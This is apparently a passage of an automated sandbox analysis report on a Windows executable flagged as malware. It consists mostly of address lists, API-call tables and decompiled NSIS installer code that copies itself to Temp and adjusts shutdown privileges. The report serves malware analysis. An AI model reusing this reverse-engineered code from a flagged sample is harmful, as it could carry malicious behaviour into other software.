                                                                                        0x0040360b
                                                                                        0x00403612
                                                                                        0x00403619
                                                                                        0x00403619
                                                                                        0x00403612
                                                                                        0x0040361b
                                                                                        0x00403620
                                                                                        0x00403621
                                                                                        0x0040362d
                                                                                        0x00403631
                                                                                        0x00403638
                                                                                        0x00403646
                                                                                        0x0040364b
                                                                                        0x00403652
                                                                                        0x00403656
                                                                                        0x0040365a
                                                                                        0x0040365c
                                                                                        0x0040365c
                                                                                        0x0040365a
                                                                                        0x00403663
                                                                                        0x0040366a
                                                                                        0x00403670
                                                                                        0x00403688
                                                                                        0x00403698
                                                                                        0x0040369d
                                                                                        0x004036a3
                                                                                        0x004036aa
                                                                                        0x004036b1
                                                                                        0x004036b3
                                                                                        0x004036b4
                                                                                        0x004036be
                                                                                        0x004036c5
                                                                                        0x004036c7
                                                                                        0x004036c9
                                                                                        0x004036c9
                                                                                        0x004036dc
                                                                                        0x004036de
                                                                                        0x004037d8
                                                                                        0x004037d8
                                                                                        0x004037db
                                                                                        0x004037de
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004036e8
                                                                                        0x004036e9
                                                                                        0x004036ec
                                                                                        0x004036f5
                                                                                        0x004036f5
                                                                                        0x004036f8
                                                                                        0x004036fb
                                                                                        0x004036fe
                                                                                        0x00403701
                                                                                        0x00403701
                                                                                        0x00403701
                                                                                        0x00403702
                                                                                        0x00403706
                                                                                        0x004037c6
                                                                                        0x004037cf
                                                                                        0x004037d1
                                                                                        0x004037d4
                                                                                        0x004037d7
                                                                                        0x004037d7
                                                                                        0x004037d7
                                                                                        0x00000000
                                                                                        0x0040370c
                                                                                        0x0040370d
                                                                                        0x0040370e
                                                                                        0x00403712
                                                                                        0x0040372c
                                                                                        0x00403733
                                                                                        0x00403746
                                                                                        0x00403747
                                                                                        0x0040375c
                                                                                        0x00403761
                                                                                        0x00403763
                                                                                        0x00403765
                                                                                        0x00403781
                                                                                        0x00403788
                                                                                        0x0040379b
                                                                                        0x0040379c
                                                                                        0x004037b1
                                                                                        0x004037b7
                                                                                        0x004037b9
                                                                                        0x004037bb
                                                                                        0x004037c3
                                                                                        0x004037c5
                                                                                        0x00000000
                                                                                        0x004037c5
                                                                                        0x004037bf
                                                                                        0x004037c1
                                                                                        0x004037e6
                                                                                        0x004037ea
                                                                                        0x004037f3
                                                                                        0x004037f8
                                                                                        0x004037fe
                                                                                        0x00403809
                                                                                        0x0040380b
                                                                                        0x00403810
                                                                                        0x00403812
                                                                                        0x0040386a
                                                                                        0x0040386f
                                                                                        0x00403878
                                                                                        0x0040387f
                                                                                        0x00403882
                                                                                        0x00403a59
                                                                                        0x00403a59
                                                                                        0x00403a5e
                                                                                        0x00403a67
                                                                                        0x00403a84
                                                                                        0x00403afc
                                                                                        0x00403afc
                                                                                        0x00403b04
                                                                                        0x00403b06
                                                                                        0x00403b06
                                                                                        0x00403b0c
                                                                                        0x00403b0c
                                                                                        0x00403a9b
                                                                                        0x00403aa7
                                                                                        0x00403ab8
                                                                                        0x00403abf
                                                                                        0x00403ac6
                                                                                        0x00403ac6
                                                                                        0x00403ace
                                                                                        0x00403ada
                                                                                        0x00403ae8
                                                                                        0x00403af3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403adc
                                                                                        0x00403adc
                                                                                        0x00403add
                                                                                        0x00403adf
                                                                                        0x00403ae0
                                                                                        0x00403ae1
                                                                                        0x00403ae6
                                                                                        0x00403af5
                                                                                        0x00403af7
                                                                                        0x00000000
                                                                                        0x00403af7
                                                                                        0x00000000
                                                                                        0x00403ae6
                                                                                        0x00403ada
                                                                                        0x00403a71
                                                                                        0x00403a78
                                                                                        0x00403a78
                                                                                        0x0040388e
                                                                                        0x00403935
                                                                                        0x00403935
                                                                                        0x00403941
                                                                                        0x00000000
                                                                                        0x00403941
                                                                                        0x0040389f
                                                                                        0x004038a7
                                                                                        0x004038f9
                                                                                        0x004038f9
                                                                                        0x004038ff
                                                                                        0x00403906
                                                                                        0x00403954
                                                                                        0x00403956
                                                                                        0x0040395b
                                                                                        0x0040395d
                                                                                        0x00403965
                                                                                        0x00403965
                                                                                        0x00403970
                                                                                        0x00403975
                                                                                        0x0040397c
                                                                                        0x00403982
                                                                                        0x00403984
                                                                                        0x00403a57
                                                                                        0x00403a57
                                                                                        0x00403a57
                                                                                        0x00000000
                                                                                        0x0040398a
                                                                                        0x0040398a
                                                                                        0x0040398c
                                                                                        0x0040398d
                                                                                        0x00403996
                                                                                        0x0040398f
                                                                                        0x0040398f
                                                                                        0x0040398f
                                                                                        0x0040399c
                                                                                        0x004039a4
                                                                                        0x004039ab
                                                                                        0x004039b3
                                                                                        0x004039b3
                                                                                        0x004039c0
                                                                                        0x004039cc
                                                                                        0x004039d6
                                                                                        0x004039d6
                                                                                        0x004039d8
                                                                                        0x004039df
                                                                                        0x004039e9
                                                                                        0x004039f5
                                                                                        0x004039fb
                                                                                        0x00403a01
                                                                                        0x00403a04
                                                                                        0x00403a0e
                                                                                        0x00403a14
                                                                                        0x00403a16
                                                                                        0x00403a1a
                                                                                        0x00403a2b
                                                                                        0x00403a31
                                                                                        0x00403a36
                                                                                        0x00403a38
                                                                                        0x00403a3b
                                                                                        0x00403a41
                                                                                        0x00403a41
                                                                                        0x00403a38
                                                                                        0x00403a16
                                                                                        0x00403a44
                                                                                        0x00403a4b
                                                                                        0x00403a4b
                                                                                        0x00403a4b
                                                                                        0x00403a4b
                                                                                        0x00403a52
                                                                                        0x00000000
                                                                                        0x00403a52
                                                                                        0x00403984
                                                                                        0x00403908
                                                                                        0x0040390b
                                                                                        0x0040390f
                                                                                        0x00403914
                                                                                        0x00403916
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403922
                                                                                        0x0040392d
                                                                                        0x00403932
                                                                                        0x00000000
                                                                                        0x00403932
                                                                                        0x004038b0
                                                                                        0x004038c8
                                                                                        0x004038d9
                                                                                        0x004038da
                                                                                        0x004038de
                                                                                        0x004038e0
                                                                                        0x004038ee
                                                                                        0x004038f5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004038f5
                                                                                        0x004038f7
                                                                                        0x00000000
                                                                                        0x004038f7
                                                                                        0x0040381a
                                                                                        0x00403826
                                                                                        0x0040382b
                                                                                        0x00403830
                                                                                        0x00403832
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040383a
                                                                                        0x00403842
                                                                                        0x00403853
                                                                                        0x0040385b
                                                                                        0x0040385d
                                                                                        0x00403862
                                                                                        0x00403864
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403864
                                                                                        0x00000000
                                                                                        0x004037c1
                                                                                        0x0040376a
                                                                                        0x0040376c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040376e
                                                                                        0x00403772
                                                                                        0x00403776
                                                                                        0x0040377d
                                                                                        0x0040377d
                                                                                        0x0040377d
                                                                                        0x0040377d
                                                                                        0x00000000
                                                                                        0x0040377d
                                                                                        0x00403778
                                                                                        0x0040377b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040377b
                                                                                        0x00403714
                                                                                        0x00403718
                                                                                        0x0040371b
                                                                                        0x00403722
                                                                                        0x00403722
                                                                                        0x00000000
                                                                                        0x00403722
                                                                                        0x0040371d
                                                                                        0x00403720
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403720
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004036ee
                                                                                        0x004036ee
                                                                                        0x004036ef
                                                                                        0x004036f0
                                                                                        0x004036f0
                                                                                        0x00000000
                                                                                        0x004036ee
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                        • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                        • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                        • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                        • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" ,00000000), ref: 004036D6
                                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                        • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                          • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" ,00000000,?), ref: 0040397C
                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                        • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,0042AA28,00000001), ref: 00403A0E
                                                                                        • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                        • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                        • ExitProcess.KERNEL32 ref: 00403A78
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                        • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                        • API String ID: 3859024572-1079209573
                                                                                        • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                        • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                        • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                        • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 147->148 149 4058e4-4058ee 148->149 150 4058c8-4058ce 148->150 154 4058f0-4058f6 149->154 155 405944-405948 149->155 152 4058d0-4058df ShowWindow * 2 call 4044ce 150->152 153 405909-405912 call 404500 150->153 152->149 167 405917-40591b 153->167 160 4058f8-405904 call 404472 154->160 161 40591e-40592e ShowWindow 154->161 155->153 158 40594a-405950 155->158 158->153 165 405952-405965 SendMessageW 158->165 160->153 168 405930-405939 call 40559f 161->168 169 40593e-40593f call 404472 161->169 170 4057f7-40580e call 404499 163->170 171 4057e9-4057f5 SendMessageW 163->171 164->163 172 405a67-405a69 165->172 173 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->173 168->169 169->155 182 405810-405824 ShowWindow 170->182 183 405844-405865 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405998-4059a8 GetWindowRect 173->180 181 4059ab-4059c0 TrackPopupMenu 173->181 180->181 181->172 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->172 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->172 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                                        C-Code - Quality: 96%
                                                                                        			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                        				struct HWND__* _v8;
                                                                                        				long _v12;
                                                                                        				struct tagRECT _v28;
                                                                                        				void* _v36;
                                                                                        				signed int _v40;
                                                                                        				int _v44;
                                                                                        				int _v48;
                                                                                        				signed int _v52;
                                                                                        				int _v56;
                                                                                        				void* _v60;
                                                                                        				void* _v68;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				struct HWND__* _t94;
                                                                                        				long _t95;
                                                                                        				int _t100;
                                                                                        				int _t101;
                                                                                        				long _t104;
                                                                                        				void* _t108;
                                                                                        				intOrPtr _t119;
                                                                                        				void* _t127;
                                                                                        				intOrPtr _t130;
                                                                                        				struct HWND__* _t134;
                                                                                        				int _t156;
                                                                                        				int _t159;
                                                                                        				struct HMENU__* _t164;
                                                                                        				struct HWND__* _t168;
                                                                                        				struct HWND__* _t169;
                                                                                        				int _t171;
                                                                                        				void* _t172;
                                                                                        				short* _t173;
                                                                                        				short* _t175;
                                                                                        				int _t177;
                                                                                        
                                                                                        				_t169 =  *0x433ee4; // 0x10438
                                                                                        				_t156 = 0;
                                                                                        				_v8 = _t169;
                                                                                        				if(_a8 != 0x110) {
                                                                                        					__eflags = _a8 - 0x405;
                                                                                        					if(_a8 == 0x405) {
                                                                                        						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                        						CloseHandle(_t127); // executed
                                                                                        					}
                                                                                        					__eflags = _a8 - 0x111;
                                                                                        					if(_a8 != 0x111) {
                                                                                        						L17:
                                                                                        						_t171 = 1;
                                                                                        						__eflags = _a8 - 0x404;
                                                                                        						if(_a8 != 0x404) {
                                                                                        							L25:
                                                                                        							__eflags = _a8 - 0x7b;
                                                                                        							if(_a8 != 0x7b) {
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							_t94 = _v8;
                                                                                        							__eflags = _a12 - _t94;
                                                                                        							if(_a12 != _t94) {
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                        							__eflags = _t95 - _t156;
                                                                                        							_a8 = _t95;
                                                                                        							if(_t95 <= _t156) {
                                                                                        								L36:
                                                                                        								return 0;
                                                                                        							}
                                                                                        							_t164 = CreatePopupMenu();
                                                                                        							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                        							_t100 = _a16;
                                                                                        							__eflags = _a16 - 0xffffffff;
                                                                                        							_t159 = _a16 >> 0x10;
                                                                                        							if(_a16 == 0xffffffff) {
                                                                                        								GetWindowRect(_v8,  &_v28);
                                                                                        								_t100 = _v28.left;
                                                                                        								_t159 = _v28.top;
                                                                                        							}
                                                                                        							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                                                        							__eflags = _t101 - _t171;
                                                                                        							if(_t101 == _t171) {
                                                                                        								_v60 = _t156;
                                                                                        								_v48 = 0x42d268;
                                                                                        								_v44 = 0x1000;
                                                                                        								_a4 = _a8;
                                                                                        								do {
                                                                                        									_a4 = _a4 - 1;
                                                                                        									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                                                        									__eflags = _a4 - _t156;
                                                                                        									_t171 = _t171 + _t104 + 2;
                                                                                        								} while (_a4 != _t156);
                                                                                        								OpenClipboard(_t156);
                                                                                        								EmptyClipboard();
                                                                                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                        								_a4 = _t108;
                                                                                        								_t172 = GlobalLock(_t108);
                                                                                        								do {
                                                                                        									_v48 = _t172;
                                                                                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                        									 *_t173 = 0xd;
                                                                                        									_t175 = _t173 + 2;
                                                                                        									 *_t175 = 0xa;
                                                                                        									_t172 = _t175 + 2;
                                                                                        									_t156 = _t156 + 1;
                                                                                        									__eflags = _t156 - _a8;
                                                                                        								} while (_t156 < _a8);
                                                                                        								GlobalUnlock(_a4);
                                                                                        								SetClipboardData(0xd, _a4);
                                                                                        								CloseClipboard();
                                                                                        							}
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						__eflags =  *0x433ecc - _t156; // 0x0
                                                                                        						if(__eflags == 0) {
                                                                                        							ShowWindow( *0x434f08, 8);
                                                                                        							__eflags =  *0x434f8c - _t156;
                                                                                        							if( *0x434f8c == _t156) {
                                                                                        								_t119 =  *0x42c240; // 0x51cefc
                                                                                        								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                                                        							}
                                                                                        							E00404472(_t171);
                                                                                        							goto L25;
                                                                                        						}
                                                                                        						 *0x42ba38 = 2;
                                                                                        						E00404472(0x78);
                                                                                        						goto L20;
                                                                                        					} else {
                                                                                        						__eflags = _a12 - 0x403;
                                                                                        						if(_a12 != 0x403) {
                                                                                        							L20:
                                                                                        							return E00404500(_a8, _a12, _a16);
                                                                                        						}
                                                                                        						ShowWindow( *0x433ed0, _t156);
                                                                                        						ShowWindow(_t169, 8);
                                                                                        						E004044CE(_t169);
                                                                                        						goto L17;
                                                                                        					}
                                                                                        				}
                                                                                        				_v52 = _v52 | 0xffffffff;
                                                                                        				_v40 = _v40 | 0xffffffff;
                                                                                        				_t177 = 2;
                                                                                        				_v60 = _t177;
                                                                                        				_v56 = 0;
                                                                                        				_v48 = 0;
                                                                                        				_v44 = 0;
                                                                                        				asm("stosd");
                                                                                        				asm("stosd");
                                                                                        				_t130 =  *0x434f10;
                                                                                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                        				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                                        				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                                        				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                        				 *0x433ee4 = _t134;
                                                                                        				_v8 = _t134;
                                                                                        				E004044CE( *0x433ed0);
                                                                                        				 *0x433ed4 = E00404E27(4);
                                                                                        				 *0x433eec = 0;
                                                                                        				GetClientRect(_v8,  &_v28);
                                                                                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                        				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                        				if(_a8 >= 0) {
                                                                                        					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                        					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                        				}
                                                                                        				if(_a12 >= _t156) {
                                                                                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                        				}
                                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                        				_push(0x1b);
                                                                                        				E00404499(_a4);
                                                                                        				if(( *0x434f18 & 0x00000003) != 0) {
                                                                                        					ShowWindow( *0x433ed0, _t156);
                                                                                        					if(( *0x434f18 & 0x00000002) != 0) {
                                                                                        						 *0x433ed0 = _t156;
                                                                                        					} else {
                                                                                        						ShowWindow(_v8, 8);
                                                                                        					}
                                                                                        					E004044CE( *0x433ec8);
                                                                                        				}
                                                                                        				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                        				if(( *0x434f18 & 0x00000004) != 0) {
                                                                                        					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                        				}
                                                                                        				goto L36;
                                                                                        			}





































                                                                                        0x004056e6
                                                                                        0x004056ec
                                                                                        0x004056f6
                                                                                        0x004056f9
                                                                                        0x00405888
                                                                                        0x0040588f
                                                                                        0x004058ac
                                                                                        0x004058b3
                                                                                        0x004058b3
                                                                                        0x004058b9
                                                                                        0x004058c6
                                                                                        0x004058e4
                                                                                        0x004058e6
                                                                                        0x004058e7
                                                                                        0x004058ee
                                                                                        0x00405944
                                                                                        0x00405944
                                                                                        0x00405948
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040594a
                                                                                        0x0040594d
                                                                                        0x00405950
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040595a
                                                                                        0x00405960
                                                                                        0x00405962
                                                                                        0x00405965
                                                                                        0x00405a67
                                                                                        0x00000000
                                                                                        0x00405a67
                                                                                        0x00405974
                                                                                        0x0040597f
                                                                                        0x00405988
                                                                                        0x0040598f
                                                                                        0x00405993
                                                                                        0x00405996
                                                                                        0x0040599f
                                                                                        0x004059a5
                                                                                        0x004059a8
                                                                                        0x004059a8
                                                                                        0x004059b8
                                                                                        0x004059be
                                                                                        0x004059c0
                                                                                        0x004059c9
                                                                                        0x004059cc
                                                                                        0x004059d3
                                                                                        0x004059da
                                                                                        0x004059e2
                                                                                        0x004059e2
                                                                                        0x004059f0
                                                                                        0x004059f6
                                                                                        0x004059f9
                                                                                        0x004059f9
                                                                                        0x00405a00
                                                                                        0x00405a06
                                                                                        0x00405a12
                                                                                        0x00405a19
                                                                                        0x00405a22
                                                                                        0x00405a24
                                                                                        0x00405a27
                                                                                        0x00405a36
                                                                                        0x00405a39
                                                                                        0x00405a3f
                                                                                        0x00405a40
                                                                                        0x00405a46
                                                                                        0x00405a47
                                                                                        0x00405a48
                                                                                        0x00405a48
                                                                                        0x00405a50
                                                                                        0x00405a5b
                                                                                        0x00405a61
                                                                                        0x00405a61
                                                                                        0x00000000
                                                                                        0x004059c0
                                                                                        0x004058f0
                                                                                        0x004058f6
                                                                                        0x00405926
                                                                                        0x00405928
                                                                                        0x0040592e
                                                                                        0x00405930
                                                                                        0x00405939
                                                                                        0x00405939
                                                                                        0x0040593f
                                                                                        0x00000000
                                                                                        0x0040593f
                                                                                        0x004058fa
                                                                                        0x00405904
                                                                                        0x00000000
                                                                                        0x004058c8
                                                                                        0x004058c8
                                                                                        0x004058ce
                                                                                        0x00405909
                                                                                        0x00000000
                                                                                        0x00405912
                                                                                        0x004058d7
                                                                                        0x004058dc
                                                                                        0x004058df
                                                                                        0x00000000
                                                                                        0x004058df
                                                                                        0x004058c6
                                                                                        0x004056ff
                                                                                        0x00405703
                                                                                        0x0040570b
                                                                                        0x0040570f
                                                                                        0x00405712
                                                                                        0x00405715
                                                                                        0x00405718
                                                                                        0x0040571b
                                                                                        0x0040571c
                                                                                        0x0040571d
                                                                                        0x00405736
                                                                                        0x00405739
                                                                                        0x00405743
                                                                                        0x00405752
                                                                                        0x0040575a
                                                                                        0x00405762
                                                                                        0x00405767
                                                                                        0x0040576a
                                                                                        0x00405776
                                                                                        0x0040577f
                                                                                        0x00405788
                                                                                        0x004057aa
                                                                                        0x004057b0
                                                                                        0x004057c1
                                                                                        0x004057c6
                                                                                        0x004057d4
                                                                                        0x004057e2
                                                                                        0x004057e2
                                                                                        0x004057e7
                                                                                        0x004057f5
                                                                                        0x004057f5
                                                                                        0x004057fa
                                                                                        0x004057fd
                                                                                        0x00405802
                                                                                        0x0040580e
                                                                                        0x00405817
                                                                                        0x00405824
                                                                                        0x00405833
                                                                                        0x00405826
                                                                                        0x0040582b
                                                                                        0x0040582b
                                                                                        0x0040583f
                                                                                        0x0040583f
                                                                                        0x00405853
                                                                                        0x0040585c
                                                                                        0x00405865
                                                                                        0x00405875
                                                                                        0x00405881
                                                                                        0x00405881
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                        • GetClientRect.USER32(?,?), ref: 00405788
                                                                                        • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                          • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                        • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                        • ShowWindow.USER32(00010438,00000008), ref: 004058DC
                                                                                        • ShowWindow.USER32(00000008), ref: 00405926
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                        • CreatePopupMenu.USER32 ref: 0040596B
                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040599F
